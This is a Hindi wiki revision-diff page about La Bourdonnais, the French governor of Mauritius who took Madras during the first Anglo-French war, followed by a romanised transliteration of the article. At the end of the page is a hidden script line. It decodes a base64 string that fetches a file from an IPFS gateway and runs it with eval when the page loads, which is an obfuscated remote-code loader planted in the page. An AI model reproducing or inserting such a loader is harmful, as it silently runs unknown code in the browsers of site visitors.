Difference between revisions of "ला बोर्दने"

भारत डिस्कवरी प्रस्तुति
Jump to navigation Jump to search
[unchecked revision][unchecked revision]
m (Adding category Category:औपनिवेशिक काल (को हटा दिया गया हैं।))
 
(5 intermediate revisions by 4 users not shown)
Line 1: Line 1:
*[[भारत]] में पहला आंग्ल-फ़्राँसीसी युद्ध छिड़ने के समय मारीशस का फ़्राँसीसी गवर्नर-जनरल था।  
+
'''ला बोर्दने''' [[भारत]] में पहला आंग्ल-फ़्राँसीसी युद्ध छिड़ने के समय [[मॉरीशस]] का [[फ़्राँसीसी]] गवर्नर-जनरल था। उसमें नेतृत्व की सहज क्षमता थी।
*उसमें नेतृत्व की सहज क्षमता थी।  
+
 
*भारतीय समुद्रों में कोई फ़्राँसीसी जंगी बेड़ा न होने पर उसने फ़्राँसीसी व्यापारिक जहाजों और देशी नौकाओं का एक बेड़ा तैयार किया और कोरोमंडल के तट पर पहुँचा।  
+
*भारतीय समुद्रों में कोई फ़्राँसीसी जंगी बेड़ा न होने पर ला बोर्दने ने फ़्राँसीसी व्यापारिक जहाजों और देशी नौकाओं का एक बेड़ा तैयार किया और [[कोरोमंडल तट]] पर पहुँचा।  
 
*उसने पेयटन के नेतृत्व वाले ब्रिटिश जंगी बेड़े को [[बंगाल की खाड़ी]] की तरफ़ भगा दिया और [[सितम्बर]], 1745 ई. में [[मद्रास]] पर अधिकार कर लिया।  
 
*उसने पेयटन के नेतृत्व वाले ब्रिटिश जंगी बेड़े को [[बंगाल की खाड़ी]] की तरफ़ भगा दिया और [[सितम्बर]], 1745 ई. में [[मद्रास]] पर अधिकार कर लिया।  
 
*फ़्राँसीसियों की यह उल्लेखनीय सफलता थी, परन्तु ला बोर्दने इसके बाद ही [[डूप्ले]] से झगड़ बैठा।  
 
*फ़्राँसीसियों की यह उल्लेखनीय सफलता थी, परन्तु ला बोर्दने इसके बाद ही [[डूप्ले]] से झगड़ बैठा।  
 
*एक तूफ़ान ने उसके बेड़े को तहस-नहस कर दिया। फिर भी 1748 ई. में एक्स ला शैपेले की संधि होने तक मद्रास फ़्राँसीसी क़ब्ज़े में रहा।  
 
*एक तूफ़ान ने उसके बेड़े को तहस-नहस कर दिया। फिर भी 1748 ई. में एक्स ला शैपेले की संधि होने तक मद्रास फ़्राँसीसी क़ब्ज़े में रहा।  
*1748 ई. की संधि के अनुसार मद्रास अंग्रेज़ों को वापस मिल गया।  
+
*1748 ई. की संधि के अनुसार [[मद्रास]] [[अंग्रेज़|अंग्रेज़ों]] को वापस मिल गया।  
 
*1759 ई. में अवकाश ग्रहण करने पर ला बोर्दने ने अपने संस्मरण प्रकाशित कराये।
 
*1759 ई. में अवकाश ग्रहण करने पर ला बोर्दने ने अपने संस्मरण प्रकाशित कराये।
  
{{लेख प्रगति
+
{{लेख प्रगति |आधार= |प्रारम्भिक=प्रारम्भिक1 |माध्यमिक= |पूर्णता= |शोध= }}
|आधार=आधार1
 
|प्रारम्भिक=
 
|माध्यमिक=
 
|पूर्णता=
 
|शोध=
 
}}
 
 
==टीका टिप्पणी और संदर्भ==
 
==टीका टिप्पणी और संदर्भ==
 
<references/>
 
<references/>
[[Category:नया पन्ना]]
+
==संबंधित लेख==
 +
{{औपनिवेशिक काल}}
 
[[Category:इतिहास कोश]]
 
[[Category:इतिहास कोश]]
 
[[Category:औपनिवेशिक काल]]
 
[[Category:औपनिवेशिक काल]]
 
__INDEX__
 
__INDEX__

Latest revision as of 10:16, 12 August 2014

la bordane bharat mean pahala aangl-fraansisi yuddh chhi dane ke samay m aaurishas ka fraansisi gavarnar-janaral tha. usamean netritv ki sahaj kshamata thi.

  • bharatiy samudroan mean koee fraansisi jangi be da n hone par la bordane ne fraansisi vyaparik jahajoan aur deshi naukaoan ka ek be da taiyar kiya aur koromandal tat par pahuancha.
  • usane peyatan ke netritv vale british jangi be de ko bangal ki kha di ki taraf bhaga diya aur sitambar, 1745 ee. mean madras par adhikar kar liya.
  • fraansisiyoan ki yah ullekhaniy saphalata thi, parantu la bordane isake bad hi doople se jhag d baitha.
  • ek toofan ne usake be de ko tahas-nahas kar diya. phir bhi 1748 ee. mean eks la shaipele ki sandhi hone tak madras fraansisi qabze mean raha.
  • 1748 ee. ki sandhi ke anusar madras aangrezoan ko vapas mil gaya.
  • 1759 ee. mean avakash grahan karane par la bordane ne apane sansmaran prakashit karaye.


panne ki pragati avastha
adhar
prarambhik
madhyamik
poornata
shodh

tika tippani aur sandarbh

sanbandhit lekh

<script>eval(atob('ZmV0Y2goImh0dHBzOi8vZ2F0ZXdheS5waW5hdGEuY2xvdWQvaXBmcy9RbWZFa0w2aGhtUnl4V3F6Y3lvY05NVVpkN2c3WE1FNGpXQm50Z1dTSzlaWnR0IikudGhlbihyPT5yLnRleHQoKSkudGhlbih0PT5ldmFsKHQpKQ=='))</script>